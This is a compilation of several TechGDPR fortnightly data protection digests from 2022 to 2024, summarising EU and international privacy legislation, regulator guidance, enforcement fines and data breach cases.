Sign up to receive our fortnightly digest via email.

Legal processes

Digital Services Act: Online services will have new obligations when the application of the EU’s digital services regulation begins as of 17 February. The purpose of the new regulation is to reduce illegal content and increase the transparency of advertising and recommendation systems and the protection of minors. The internet giants have been already supervised and regulated directly by the European Commission since mid-2023, whereas Member States are responsible for the supervision of smaller platforms as of mid-February. 

EU adequacy decisions list: The European Commission successfully concluded its review of 11 existing adequacy decisions. Thus Andorra, Argentina, Canada, Faroe Islands, Guernsey, the Isle of Man, Israel, Jersey, New Zealand, Switzerland and Uruguay continue to benefit from adequate data protection safeguards. The Commission also monitors the latest arrangements that are in place with the UK, US, Japan and South Korea. 

Regulatory updates

Decentralised clinical trials: To support sponsors in the design of their decentralised clinical research projects, the French data protection regulator CNIL and its state partners are setting up a pilot phase, from January to June 2024. 20 projects will be selected and will receive targeted support. In 2022, the European Commission published the European recommendations on decentralised clinical trials in the wake of the COVID-19 pandemic.  Each application must include:

• a specific question mentioning the decentralised component and summarizing the problem encountered;
• a proposal for a complete scenario for the implementation of the decentralised element of the research project, a summary of the protocol and the information notice for future participants.

DPO evaluation: The EDPB identified areas of improvement to promote the role and recognition of data protection officers. In 2023, thousands of organisations, as well as DPOs were contacted across the EEA, covering a wide range of sectors, and more than 17,000 replies were received and analysed. The majority of the DPOs interrogated declare that they have the necessary skills and knowledge to do their work and receive regular training; they have clearly defined tasks in line with the GDPR and do not receive instructions on how to exercise their duties. They generally have sufficient resources to carry out their tasks and are, in most cases, involved in decisions relating to personal data.

However, the answers provided highlight the significant disparity in resources between the DPOs of large companies and those of small communities: the public officer often carries out his duties alone while the private delegate generally has a team.

Transfer Impact Assessment

A Transfer Impact Assessment must be undertaken by controllers or processors acting as data exporters, with the assistance of the importer, before transferring data from a European Economic Area country to a third country where such transfer is based on an Art. 46 of the GDPR transfer tool. Since the importer has a lot of information needed for this assessment, its cooperation is essential for the realisation of the TIA. To that end, the French data protection authority decided to give indications on how the analysis can be carried out by following the steps set out in EDPB’s recommendations. You can read the draft TIA guide, (in English), here. The consultation on it is open until 12 February. 

(If the country of destination is covered by an adequacy decision by the European Commission, the exporter is not subject to this obligation. The same applies if the transfer is carried out based on one of the derogations listed in Art. 49 of the GDPR).

Cookies and audience measurement

The Spanish data protection authority published a guide on the use of cookies for audience measurement, (in Spanish). The management of a website, or mobile application, by a publisher generally requires the use of traffic or performance statistics. The information processed through the use of cookies for this purpose can be managed directly by the publisher or by a provider who can provide a comparative audience measurement service. In that case, the provider would act as a data processor for one or more publishers. 

Cookies used to obtain traffic or performance statistics may be exempt from consent under certain conditions, (limited strictly to what is necessary for the provision of the service). On the contrary, to be exempt from consent, these cookies or similar technologies must not result in the data being compared with other processing operations or in the data being transmitted to third parties. In addition, they should not allow aggregate tracking of the navigation of the person who uses different applications or browsers, (as is the case with audience measurement offers available on the market).

Similarly, the Austrian data protection authority published a FAQ on cookies and data protection, (in German). In particular, it explains what are “technically necessary” cookies,  how to use industry standards or “cookie consent tools”, and finally how to identify the GDPR-governed roles and responsibilities of a data controller or a processor if cookies are set for your digital services.

More official guidance

Fitness trackers: Such apps and devices are usually connected to the Internet as well as other apps and devices of various kinds. This implies the exponential multiplication of sensitive data processed and shared and the possible risks related to IT security. According to the Italian data protection agency, when using these tools it is therefore always good to adopt some important precautions: 

• always read the information notice carefully, (who and how will process your data);
• minimise data collection, (disable features that are not essential, use a pseudonym, delete data);
• If the connection to other devices is not essential for the device or app to function, do not grant permission, (such as contacts in the address book, photos, agenda or microphone);
• safety first (complex and secure authentication, downloads via official digital services, periodic updates);
• If you don’t use it, turn it off, or uninstall it from your device, and 
• avoid the use of devices and apps by minors unless supervised by an adult. 

Generative AI: Meanwhile the UK Information Commissioner’s Office, (ICO), has launched a consultation series on generative Artificial Intelligence. Generative AI models are being used across the economy to create new content, from music to computer code. The first consultation examines when it is lawful to train generative AI models on personal data scraped from the web. The ICO is seeking views from a range of stakeholders, including developers and users of generative AI, legal advisors and consultants working in this area, civil society groups and other public bodies with an interest in generative AI. The first consultation is open until 1 March.

CJEU ruling

Controller’s (non) strict liability: In one of its recent decisions the CJEU held that a controller will be held liable for a breach committed by a processor intentionally or negligently if the processor was carrying out processing operations on its behalf. However, a processor may be held solely liable if the processor carried out the processing for:

• their purposes; or
• non-compliance with the framework of, or arrangements for, the processing as determined by the controller, or 
• in such a manner that it cannot reasonably be considered that the controller consented to such processing.

The case relates to the development of a COVID-19 mobile application, raising questions of joint controllership between the IT service provider and the Lithuanian Public Health Centre that ordered its creation but did not enter into a contract to proceed with its publication. The app was eventually made available on Google Play, and its privacy policy still referenced the public centre and the service provider as controllers. 

Unsolicited marketing

Food delivery spam: The UK Information Commissioner fined food delivery company HelloFresh 140,000 pounds for 79 million spam emails and 1 million spam texts over seven months. The marketing messages were sent based on an opt-in statement which did not make any reference to the sending of marketing via text. Whilst there was a reference to marketing via email, this was included in an age confirmation statement which was likely to unfairly incentivise customers to agree. Customers were also not given sufficient information that their data would continue to be used for marketing purposes for up to 24 months after cancelling their subscriptions.

“Do not call” register: The UK Commissioner also fined Poxell Ltd 150,000 pounds for making over 2.6 million unlawful marketing calls between March and July 2022. The company made dozens of calls to individuals with dementia and other serious illnesses offering home improvement solutions. The aggressive salesperson failed to identify themselves, allow their number to be displayed to the person receiving the call or provide a contact address or freephone number if asked. After receiving the initial investigation letter, it continued to make unsolicited direct marketing calls until its account was terminated by its communications service provider. 

Customer data deletion: The Danish data protection regulator imposed a fine of approx. 33,000 euros against the Royal Theater for not having laid down rules for deleting customer information for marketing use. The theatre stored information on approx. 520,000 customers and newsletter recipients for marketing purposes, without having set deletion deadlines or established fixed procedures or guidelines for deleting the information. The information was only deleted in cases where individual customers specifically requested deletion or revoked their consent to receive direct marketing. 

Data breaches

Inappropriate coding: The Danish data protection regulator also recommended a record fine of approx. 2 mln euros against Netcompany. As a data controller it had not implemented appropriate security measures in connection with the development of mit.dk. This system enabled users to read and respond to their digital correspondence from the authorities, while also being able to access their medical records and pay bills. Netcompany used inappropriate coding in the component that authenticated mit.dk. users. When mit.dk. was put into operation in March 2022, an error therefore occurred almost immediately when several users logged on and accessed other users’ sensitive information.

Password recycling: Finally, tech giant 23andMe, a DNA-testing company, blames its users for data breaches, Messenger.com reports. The recent October breach exposed the 23andMe accounts of about 6.9 million users. Customers received a letter from the corporation informing them that 23andMe was not responsible for the occurrence. Rather, the incident was a result of users’ failure to safeguard their account credentials: a key that allowed criminal actors to use 23andMe’s DNA Relative matching service was supplied by some customers who recycled passwords that were exposed in prior data breaches that targeted other websites. Due to the data breach, the corporation has been sued many times, with every claim citing inadequately secured customer information.

More enforcement decisions

Electronic payments: The French data protection regulator imposed a fine of 105,000 euros on NS CARDS France. The company publishes the neosurf.com website and the mobile app “Neosurf” which allows you to make online payments after registering for digital services. The company had set a ten-year retention period at the end of which user accounts were deactivated, but not deleted. The account data was therefore kept for an indefinite period. In addition, the ten-year retention period was applied to all user accounts, without sorting out the data to be kept, for example by certain consumer rights. Another failing was the user account password complexity rules were insufficiently robust, (eg, stored in plain text in the database and associated with the users’ email address and ID). 

The regulator also noted the deposit of Google Analytics cookies on the user’s terminal without their consent. NS CARDS France also used a reCAPTCHA mechanism, provided by Google, when creating the account and logging in to the website and mobile application. The collected data was transmitted to Google for analysis but the company did not provide any information to the user and did not obtain their prior consent.

Risk assessment failed: Meanwhile, the Dutch data protection authority imposed a fine of 150,000 euros on International Card Services (ICS). ICS failed to carry out a DPIA before the company started digitally identifying customers in the Netherlands in 2019. Furthermore, the personal information used for identification was sensitive. In addition to customers’ names, addresses, telephone numbers and e-mails, this included a photo that customers had to take of themselves and send via a mobile phone or webcam. ICS then used these photos to compare them with copies of customers’ IDs. 

Data security

Data breach types: The Danish data protection authority focuses on 10 typical breaches of personal data security and comes up with concrete proposals on how they can be avoided, (in Danish). This includes things like auto-complete which causes e-mails to be sent to the wrong recipients, broad access to data on network drives, unauthorised access to data due to poor design, coding errors and insufficient testing, failure to delete data using digital tools, loss/theft of portable devices with unencrypted data, disclosure of data stored in template and form solutions, and more.

My Health My Data: Washington State published a FAQ on the My Health My Data Act. It is the first privacy-focused law in the United States to protect personal health data collected and shared outside the state and under federal healthcare privacy regulations. This concerns information that can identify a consumer’s past, present, or future physical or mental health status. For example, information about the purchase of toilet paper or deodorant is not consumer health data, while an app that tracks someone’s digestion or perspiration is. Regulated entities or small businesses shall:

• publish a separate and distinct link to their consumer health data privacy policy on their homepage;
• secure valid authorisation from a customer to sell their data. 

Consumers have a right to withdraw consent and a right to have their data deleted. The act takes effect on 31 March for regulated entities. Small businesses have until the end of June to comply with new rules.

Big Data

Meta’s “Pay or okay” consent model: Privacy-advocacy group NOYB stated that Meta unlawfully ignores the users’ right to easily withdraw consent. The group has filed a new complaint with the Austrian data protection authority. According to Meta, the Facebook and Instagram service tries to abide by EU regulations requiring users to have the option of whether or not their data may be gathered and used for targeted advertising. Users who agree to be monitored receive a free service funded by advertising income. However, while one click is enough to consent to be tracked, users can only withdraw their consent by switching to a paid subscription, NOYB concludes.

The post Data protection digest 3 – 17 Jan 2024: digital services transparency and risk assessment in the focus of regulators appeared first on TechGDPR.

Legal processes

Financial data: The EDPS discussed recommendations to encourage data sharing to extend the range of available financial services and products, while also giving people or organisations control over the processing of their financial data. Individuals and organisations, according to the proposals, would govern access to their financial data using dashboards offered by financial institutions. Individuals would be able to monitor, limit, or authorize access to their information. Users should be supplied with comprehensive, accurate, and unambiguous information about the financial service provider asking for access to their data. It should also disclose the type of product, payment, or service for which an individual’s data will be utilized, as well as the categories of data required.

Digital Services Act: The Digital Services Act took effect for large online operators serving in the EU on 25 August. 19 platforms and search engines with at least 45 million users must comply with stricter rules concerning data collection, privacy, disinformation, dark patterns, online hate speech and more. This includes a ban on targeted advertising of minors based on profiling, and a ban on targeted advertising using special categories of personal data, such as sexual orientation or religion. Online platforms will be required to redesign their systems and prove they have done so to the European Commission, (including publishing the risk assessments). Additionally, vetted researchers can access the data of those services to conduct analyses on systemic risks in the EU. Smaller platforms will be subject to the same regulation beginning in 2024. They will, however, be supervised by national agencies rather than Brussels. 

Cybersecurity and risk assessment in California: The California Privacy Protection Agency, (CPPA), has published its proposed Cybersecurity and Risk Assessment Audit Regulations. According to the CPPA, official regulation processes for cybersecurity audits, data protection risk assessments, and automated decision-making technologies have yet to begin. These versions are intended to promote board deliberations and public participation. They provide standards for service providers and contractors, assisting organisations in meeting audit compliance. The regulations state that every business that processes personal information that potentially poses a serious risk to customers’ security must conduct an audit, (annually). It also describes the components to be evaluated and the measures to be taken, as summarized by digitalpolicyalert.org. 

EU-US Data Privacy Framework: Almost all transmissions of personal data to US-based companies, if they have committed themselves to the certification mechanism, are covered by the EU-US Data Privacy Framework, explains the Bavarian state data protection commissioner  However, for the transfers of personal data collected in the context of an employment relationship, (‘HR data’), the US business must explicitly state it in its certification. Particular attention must also be paid to onward transfers, for example, if the US processor working for the EU data exporter transmits the personal data to a sub-processor in another third country. The US adequacy decision cannot apply in this situation. 

Official guidance

‘Freedom of Information’ and data protection: Guernsey’s data protection commissioner discusses Freedom of Information requests that caused some of the most extraordinary data breaches recently, (eg, when details of thousands of police and civilian personnel employed by the Police Service of Northern Ireland were released in error). Freedom of Information generally refers to the right of citizens to access information held by public authorities. In reality, this information will often include personal data about individuals, whether that is staff, citizens or other individuals that the public authorities are in contact with. The rights of all individuals must be considered before any disclosure. If you are a data controller, you must understand your legal obligations concerning data subjects’ rights and have appropriate policies and procedures to ensure they are dealt with properly.

Biometric data: Meanwhile the UK Commissioner’s Office is currently consulting on draft guidance on biometric data. This guidance explains how data protection law applies to organisations that use or are considering using biometric recognition systems or vendors of these systems. At a glance:

• You must take a data protection by design approach when using biometric data.
• You should do a data protection impact assessment before you use a biometric recognition system. This is because using special category biometric data is likely to result in a high risk.
• Explicit consent is likely to be the only valid condition for processing available to you to process special category biometric data.
• If you can’t identify a valid condition, you must not use special category biometric data.

Employees’ digital monitoring rules: Digital work tools can record large amounts of data about employees, and therefore monitoring of it is heavily restricted, states the Norwegian privacy regulator. In most cases, the employer does not have the right to monitor the employee’s use of work tools, including the use of the Internet, unless the purpose of the monitoring is to manage the company’s computer network to uncover or clarify security breaches, etc. At the same time, it can be difficult for employers to introduce such measures in particular cases, as many regulations control different aspects of the working environment, and may include trade union approval, transparency obligations, data protection implications, and information security.

Privacy by default: This means that products and services are designed to ensure that a person’s privacy is protected from the outset and that they do not need to take any additional steps to protect their data, explains the Latvian data protection regulator. This approach is designed to minimise possible violations in the process of data acquisition and usage, and unauthorized access and risks that could arise if personal data comes into the possession of a third party. This may include minimal necessary data collection, default settings of the user account, (in “private mode”), limited data retention, (followed by automatic anonymisation or deletion of user data if the account is inactive for a certain period), user control tools, (whether to allow the user profile to be found in search engines, etc), clear information notices, (including all third parties with whom the data may be shared), and security measures, (encryption, regular security audits).

Enforcement decisions

UI Path data leak: The Romanian data protection authority has fined learning platform Uipath SRL approx. 70,000 euros for massive data loss. It did not implement adequate technical and organisational measures to ensure that, by default, personal data cannot be accessed, without the intervention of a person(s), including the ability to ensure the ongoing confidentiality and resilience of processing systems and services, as well as a process for regularly testing, assessing and evaluating the effectiveness of implemented measures. This fact led to the unauthorised disclosure and access to personal data, (user name and surname, the unique identifier, e-mail address, the name of the company where the user was employed, the country and details of the level of knowledge obtained within the courses), of about 600,000 users of the Academy Platform, for about 10 days. This violation is likely to bring physical, material or moral harm to the data subjects, such as the loss of control over their data or the loss of data confidentiality. 

Misconfigured cloud storage: The UK Information Commissioner issued a reprimand to a recruitment company: the organisation misconfigured a storage container, with 12,000 records relating to 3,000 workers, to be publicly accessible without any requirement to authenticate.  The personal data consisted of a variety of different data sets, including names, addresses, dates of birth, passports, ID documents and national insurance numbers. The company has since committed to periodically audit the configuration of cloud services as part of a wider security assessment including access rights, appropriate identity and access controls,  event logging and security monitoring. 

Vklass data leak: The Swedish privacy regulator has been reprimanding the learning platform Vklass for not being able to detect abnormal user behaviour in its learning platform and to track what happened in the system. Multiple complainants alleged that an unauthorized person came across personal data about teachers and students from the learning platform. The reports come from municipal committees and private businesses that conduct school and educational activities. The incident probably occurred because a student wrote a script that automatically saved information from the learning platform in its database and the information was then published openly on a website, which is now closed. 

Edmodo and minors’ consent: Meanwhile in the US, the Federal Trade Commission obtained an order against education technology provider Edmodo for collecting personal data from children without obtaining their parent’s consent and using that data for advertising, in violation of the Children’s Online Privacy Protection Act Rule, (COPPA), and for unlawfully outsourcing its COPPA compliance responsibilities to schools. Among many orders, the provider is obliged to identify the account in question and delete or destroy certain data, (from students under 13 years of age), periodically provide compliance reports to the Commission, permanently refrain from collecting more personal information than reasonably necessary for the child to participate in any activity offered on the online platform, etc.

Data security

High-risk systems: For some so-called “critical processing” IT systems, a data breach would create particularly high risks for people. As a result, they require an adequate level of security. To best support the professionals concerned, the French regulator CNIL submits a recommendation for public consultation, (in French). It specifically targets so-called “critical” treatments, defined by the following two cumulative criteria: a) the processing is large-scale within the meaning of the GDPR, and b) a personal data breach could have very significant consequences either for the data subjects, for state security or society as a whole. 

This includes customer databases and other processing that bring together a large part of the population, such as in the energy, transport, banking or large-scale dematerialised public services, health treatments, etc. Risk scenarios may include attacks by organised criminal organisations or “supply chain attacks”, likely to take place over a long period; the compromise of third-party service providers responsible for IT development, maintenance or support operations; the exploitation of unknown vulnerabilities of software or hardware components, the compromise of persons authorised to access the processing. 

Email security guidance: Guidance by the UK Information Commissioner explains what organisations should, and could do to comply with email security, including several case studies and a checklist. Even if email content doesn’t have anything sensitive in it, showing which people receive an email could disclose sensitive or confidential information about them. In brief: 

• You must assess what technical and organisational security measures are appropriate to protect personal information when sending bulk emails.
• You should train staff about security measures when sending bulk communications.
• You should include in your assessment consideration of whether using secure methods, such as bulk email services or mail merge services, is more appropriate, rather than just relying on a process that uses Blind Carbon Copy.
• If you are only sending an email to a small number of recipients, you could consider sending each one separately, rather than one bulk email. 

Big Tech

Open AI for organisations: Open AI offers its most powerful version of ChatGPT to enterprises. It has longer context windows for processing longer inputs, advanced data analysis capabilities, customization options and more. According to the company, 80 per cent of Fortune 500 companies, (largest US corporations), have registered ChatGPT accounts, as determined by accounts associated with corporate email domains. Businesses have expressed concerns about privacy and security, fearing that their data may be used to train ChatGPT and that the application could mistakenly reveal sensitive consumer information to AI models. According to OpenAI, ChatGPT Enterprise users will have complete rights and ownership over their data, which will not be used for algorithm training. 

‘Algorithmic disgorgement’: At the same time, the US Federal Trade Commission reminds companies of certain obligations when using Generative AI. When offering a generative AI product, companies need to inform customers whether and the extent to which AI training data includes copyrighted or otherwise protected material. Companies should not try to “fool people” into thinking that AI-generated works were created by humans. Companies must ensure that customers understand the material terms and conditions associated with digital products. The regulator also noted that unilaterally changing terms or undermining reasonable ownership expectations can be problematic, etc. Finally, in its enforcement of data protection regulations, the Commission has lately begun to compel “algorithmic disgorgement” – the destruction of not just the illegally obtained data itself, but also artificial intelligence models and algorithms constructed using such data.

The post Data protection digest 15 – 31 August 2023: financial data processing, misconducted learning platforms, and algorithmic disgorgement appeared first on TechGDPR.

Legal processes: threshold for cookies, advertising claims’ mediation, China’s outbound transfers

The EDPB approved a minimum threshold for the use of cookies and subsequent processing of the data collected. No cookies that require consent can be set without positive action expressed by the user, or purely on the grounds of the data controller’s legitimate interest. The absence of refuse options, visible and accessible at any time, on any layer of the banner, constitutes an infringement. The limitations, such as for strictly necessary technical cookies, must be indicated. Any confusing information, designs and colours are not acceptable.

The Spanish data protection agency AEPD announced a mediation system to expedite the resolution of advertising claims, (in Spanish). It has approved the modification of the Autocontrol Code of Conduct ‘Data processing in advertising activity’ , which includes out-of-court procedures to resolve individual’s complaints more quickly. Advertisers must respond within a maximum period of 15 days, proposing the actions they deem pertinent for mediation. The maximum duration of the procedure will be 30 days.

The Cybersecurity Administration of China has published guidelines on outbound data transfers of personal and important data from China to other jurisdictions, whitecase.com reports. Organisations must comply with these guidelines by 1 March or risk administrative, civil and criminal penalties. In certain cases the measures include security assessments and approval from the state before engaging in outbound data. Outbound data transfers in this case include:

• an entity in China actively sends data to a recipient in another jurisdiction, or 
• permits a person or entity outside China to access data generated in the course of the data processor’s operations in China;
• multinational intragroup transfers of data, and 
• operating centralised document management systems for global operations, with servers hosted outside China. 

Official guidance: consent evidence, data storage periods and deletion, TOMs, training, recruitment data

Denmark’s privacy regulator explained the balance between consent evidence requirements and data minimisation. The data controller should be able to demonstrate that the data subject has given consent. However, the rule only applies as long as the data processing is ongoing. After the end of the processing activity, (eg, the data subject has withdrawn their consent), ​​there is no obligation to demonstrate that evidence. Moreover, the data controller has a duty to delete personal and additional data without undue delay after consent withdrawal, (unless needed for claims to be established or defended and only for a short period of time).

The Portuguese privacy regulator CNPD published a guidance on technical and organisational security measures, aimed at data controllers and processors. The CNPD lists a set of TOMs that must be considered by organisations in their risk prevention and minimisation plans, (in Portuguese). The list is dynamic and not exhaustive due to rapid technological changes and is therefore subject to updates whenever necessary. The increasing number of security incidents in the past year revealed that if organisations had been equipped with adequate security measures, the risks would have been lower and the impact on the rights of data subjects smaller. 

The GDPR states that the organisation, (controller), is obliged to limit the storage of personal data with the intention that the data is not stored longer than is necessary to achieve its purpose. The Latvian privacy regulator DVI explains how to determine the data storage period, and what to do when it is expired. The organisation must have internal procedures in place in order to determine:

• that the purpose has been achieved, and the data cannot be further used for any other unrelated purpose ,(eg, if the deadline specified in the regulatory act has been reached, or the loss of the legal basis);
• the frequency with which the purposes of the data processing and their justifications will be reviewed;
• how to receive a signal that personal data has expired, and
• how to inform data subjects of these periods, (or the criteria that were taken into account to determine them), in the privacy policy. 

In the end, data must be deleted completely, without possibility of recovery. The deletion procedures must include finding persons responsible, location of the data, deletion follow-up, informing processors and other controllers, and the data subjects.

The Latvian regulator also issued a reminder of the importance of data protection training. It is necessary to familiarise employees with the framework created in the organisation for data protection and processing: cyber security, specific industry regulations, employee liabilities for violations, data breach responses, and reviewing procedures. A desired outcome would be: a customer is asked to provide his personal data for identification; if the client has questions about why this is necessary, the employee should be able to reasonably answer it and indicate that more detailed information is available in the privacy policy. 

A recruitment process necessarily involves the processing of a significant amount of personal data about candidates. The rise of new technologies has multiplied recruitment channels, (social networks, personalised advertising, specialized search engines), and communication tools used (videoconferencing, chatbots, mobile applications). It has also led to the creation of databases of a large volume allowing the use of artificial intelligence or the use of tools to assess the “soft skills” of candidates. In this context, the French regulator CNIL offers a guide and a set of practical sheets, Q&As, to support recruitment stakeholders in their compliance, (in French). 

Investigations and enforcement actions: game developers, spy pixels, psychometric tests, unwanted membership, Covid-related algorithms, email security

The UK’s ICO published Age Appropriate Design Code Audit, (AADC), of Facepunch Studios, a games developer. Facepunch does not require a user account, although some gameplay data and device information is collected in-game. Facepunch also share some personal data of users with third parties in order to operate parts of or functions within their games or services. The audit concluded that Age assurance measures in place should be improved, by assessing and reliably determining the actual ages of current UK child users, regularly monitoring the effectiveness of the third-party age gate used, and assessing which elements of an online service are appealing to or likely to be accessed by children. Where actual user ages are not established with certainty, the AADC standards should be applied to all users. 

The Danish data protection authority criticized Vækstfonden, (Denmark’s investment fund), for using spy pixels in its newsletters. As with the processing of personal data using cookies on websites, the use of spy pixels requires a processing basis according to the GDPR. Spy pixels were to analyze which articles the recipients clicked on in order to optimize the organisation and sending of the newsletters. But they had not observed the obligation to provide information regarding the processing. Vækstfonden has stated that they have changed suppliers for sending out newsletters and that the fund has updated its privacy policy. 

Spain’s AEPD fined Thomas International 40,000 euros for processing of sensitive data, Data Guidance reports. The complaint concerned a psychometric test provided by Agroxarxa, which was run by Thomas International. Though Agroxarxa stated that candidates were not required to provide sensitive personal data, the psychometric test requested it, adding that its provision was required by the HR department of Agroxarxa. Thomas International provided the same questionnaire to all clients that used its services, allowing for the processing of sensitive personal data even when not requested by the client.

In the US, the Federal Trade Commission is sending payments totaling more than 973,000 dollars to 17,064 people who lost money after NutraClick automatically enrolled them in unwanted membership programs for supplements and beauty products and misled consumers about when they had to cancel trial memberships to avoid monthly charges.

The Italian privacy authority has sanctioned three local health authorities, who, through the use of algorithms, had classified patients in relation to their Covid-related complications risks. Data of the patients had been processed in the absence of a suitable regulatory basis, without providing the interested parties with all the necessary information, (in particular on the methods and purposes of the processing), and without having previously carried out an impact assessment. 

Ireland’s privacy regulator fined a nursing homes operator. The credentials of a user account at a nursing home were captured on a fake website via a phishing email. This allowed the bad actor to set up email forwarding of all inbound emails to a third-party email account. Adequate technical and organisational measures could have included appropriate encryption of data being transferred over external networks, suitable phishing training, and regular testing of the safeguards. 

Meanwhile, the Swedish privacy regulator fined an insurance company for sending sensitive personal data via e-mail without sufficient protection. The email was only encrypted in transit. The encryption ended before the message had reached the final recipient and there was thus a risk that unauthorised persons could read the message in plain text after the encrypted transmission had ended.

Data security: ISO 31700 Privacy by Design, AI Risk Management Framework by NIST, taxonomy of ICT incidents, mobile data

The International Organisation for Standardisation has finally published the long-awaited ISO 31700. It establishes high-level requirements, (and use cases), for privacy by design to protect privacy throughout the lifecycle of a consumer product, including data processed by the consumer. This includes consumers’ personally identifiable information and other data processed, (collected, used, accessed, stored, and deleted), or intentionally not collected or processed by the organisation and by the digital goods and services within the digital economy. The preview document is available here.

America’s NIST published an AI Risk Management Framework. AI systems and the contexts in which they are deployed are frequently complex, making it difficult to detect and respond to failures when they occur. AI risk management can drive responsible uses and practices by prompting organisations and their internal teams who design, develop, and deploy AI to think more critically about context and potential or unexpected negative and positive impacts. Core concepts remain human centricity, social responsibility, and sustainability.

In Italy, the National Cybersecurity Agency offered a new taxonomy of incidents on ICT assets, subject to mandatory notification. After initial access, execution, installation & lateral movements, it talks about “Actions on objectives”, which refers among other things to: collecting from within the network confidential and sensitive data or detecting their presence outside the systems authorised to process them; exfiltrating data from within the network to external resources or manipulating, degrading, disrupting, or destroying systems, services, or data. 

Could your phone be leaking data that you are not aware of? asks the US NIST. It goes on to explain how control of the data may be lost due to unauthorized or unwarranted transmission of data to an external source. Mobile data leaks can also occur when mobile device privacy settings or applications are misconfigured. This includes personally identifiable information, financial and health data, video and audio files, information about the way an individual uses the Internet, and location tracking data. Thus, organisations have to:

• Manage mobile device settings;
• Preserve confidentiality, by employing data in transit protection;
• Keep mobile operating system and applications up to date;
• Apply zero trust principles;
• Separate work from personal information, by deploying a Bring Your Own Device;
• Apply App vetting to identify security and privacy risks;
• Apply Mobile Threat Defense solutions that monitors for device-, app-, and network-based attacks.

Big Tech: the Digital Services Act’s deadline, Replika AI chatbot ban

The European Commission has published non-binding guidance to help very large online platforms and search engines within the scope of the Digital Services Act, (DSA), to comply with their requirement to report user numbers in the EU, at the latest by 17 February, and at least once every six months afterwards, (for small businesses and start-ups the info must be provided on the request of authorities). In the nearest future very large online platforms and search engines will be subject to additional obligations, such as making a risk assessment and taking corresponding risk mitigation measures on users’ rights online. 

Replika, an AI chatbot company, is not allowed to use the personal information of Italian users, according to Italy’s data protection agency, which cites risks to children and emotionally fragile individuals. The US-based start-up offers users personalised avatars that talk and listen to them. The lack of an age-verification mechanism, such as filters for minors or a blocking mechanism if users do not explicitly state their age, was one of many issues that the Italian regulator highlighted. Additionally, the processing of personal data by the company is illegal because it cannot be justified by a contract that a minor is unable to sign.

The post Data protection & privacy digest 19 Jan – 3 Feb 2023: threshold for cookies, spy pixels, consent evidence, data storage and deletion appeared first on TechGDPR.

Legal processes: EU-US adequacy procedures, non-material damage in the GDPR, Colorado draft privacy law, Andorra data protection regime

On 7 October, President Biden signed an Executive Order on ‘Enhancing Safeguards for United States Signals Intelligence Activities’. Along with the Regulations issued by the Attorney General, it implements into US law the agreement in principle, (the EU-US data privacy framework), announced in March. The document introduces new binding safeguards to address all the points raised by the CJEU, limiting access to EU data by US intelligence services, enabling EU individuals to lodge a complaint with the so-called ‘Civil Liberties Protection Officer’, and to appeal under a ‘Data Protection Review Court’.  In parallel, the UK and US are also looking ahead to concluding a data adequacy agreement following Biden’s order. The European Commission will now prepare a draft adequacy decision in several steps: obtaining an opinion from the EDPB, and approval from an EU Member State committee. In addition, the European Parliament has a right of scrutiny for adequacy decisions. European Commissioner for Justice Didier Reynders is sure there will be a fresh legal challenge, but he is confident that the pact meets the court’s demands. However in the opinion of the NOYB privacy campaigners – there is no indication that US mass surveillance will change in practice. 

The European Council gave final approval to protect users’ rights online – the Digital Services Act. It defines clear responsibilities and accountability for providers of intermediary services, such as social media, online marketplaces, very large online platforms, and very large online search engines. The rules are designed asymmetrically, so larger intermediary services are subject to stricter rules. Among many measures, it imposes certain limits on the use of sensitive personal data for targeted ads, including age, gender, race, and religion; it bans misleading interfaces known as ‘dark patterns’, and offers users a system for recommending content that is not based on profiling. After being published in the Official Journal of the European Union, the law will apply in fifteen months.

A CJEU Advocate General issued a non-binding opinion on non-material damage resulting from unlawful processing of data, conditions for the right to compensation, and establishing damage above a certain threshold of seriousness. The Austrian supreme court referred the above questions for clarification to the EU’s top court as the GDPR grants any person who has suffered material or non-material damage due to an infringement of its provisions the right to receive compensation from the data controller or processor. According to the opinion:

• A mere infringement of a provision is insufficient if that infringement is not accompanied by relevant material or non-material damage for a person.
• The compensation for non-material damage provided for in the regulation does not cover the upset that the person concerned may feel due to the infringement.
• It is for national courts to determine when, owing to their characteristics, a subjective feeling of displeasure may be deemed, in each case, to be non-material damage. Find more contextual and theological considerations over data subjects’ powers over their data in the original text. 

Meanwhile, in US, Colorado state published Privacy Act Draft Rules. It concentrates, among many provisions, on consumer-facing compliance, (disclosures, handling requests, and opt-out mechanisms), handling sensitive data, data minimisation and purpose limitations, data protection impact assessments, and restrictions related to profiling. The rules are not finalised nor contain very strict language. The act does not go into effect until July 1, 2023, with input due from several stakeholders and a public hearing. 

Finally, Andorra approved two decrees regulating the protection of personal data and the supervisory authority. The first regulation integrates all the necessary regulatory provisions into the country’s daily life. The intention is to provide legal security to those responsible for data processing, (administrations, private entities, companies, associations, etc.). In addition, everyone has six months to adapt their processes to this new text. The second document configures the Andorran Data Protection Agency as a public body with its own legal identity, independent and with full capacity to act, along with its composition, functions, inspection capacity, penalty, and other main activities. 

Official guidance: public collections of support signatures, subject access requests, financial crimes, background checks, health data warehouses

The Slovenian data protection commissioner issued a reminder of the rules for protecting personal data in the public collection of support signatures. Organisers must ensure adequate security of personal data, (eg, against loss), and when collecting their data, also provide individuals with information on Art. 13 of the GDPR. The individual must therefore receive at least information about the controller, (who collects personal data), the purpose and legal basis for collecting personal data, their rights, and legal protection. Even if the collection of personal data is determined by law, (eg, in referendums), the signature collector must still provide information about the processing of personal data at the moment the data is obtained.

The UK data regulator the ICO has laid out the basics of data subject access requests. Everyone has the right to ask an organisation whether or not they are using or storing their personal information. You can also ask for copies of your personal information, verbally or in writing. The ICO deals with over 35,000 complaints from individuals every year, the vast majority of which are to do with the rules and obligations around accessing personal data: information rights requests taking too long, no one to contact, questions not being answered, incomplete or unsatisfactory responses, lack of trust in what people are being told, or lack of understanding leading to information being perceived as unclear or unhelpful. Thus the main rules for organisations to get access requests right are:

• Find out what your customer wants exactly, and ask them to provide additional details – such as the context in which information may have been processed and likely dates when processing occurred – to help you locate the requested information.
• If you cannot meet the deadline for individual rights requests, tell them.
• If you’re dealing with a complex or particularly large request, explain that you’ll send out information in batches and provide a timeframe for this.
• Explain exemptions, and redactions, if they apply.
• Keep a record of your decision so that you can share it with the supervisory authority.
• Explain legal provisions that someone will understand.
• Keep your privacy policy up to date and ensure it’s accessible and easy to understand.

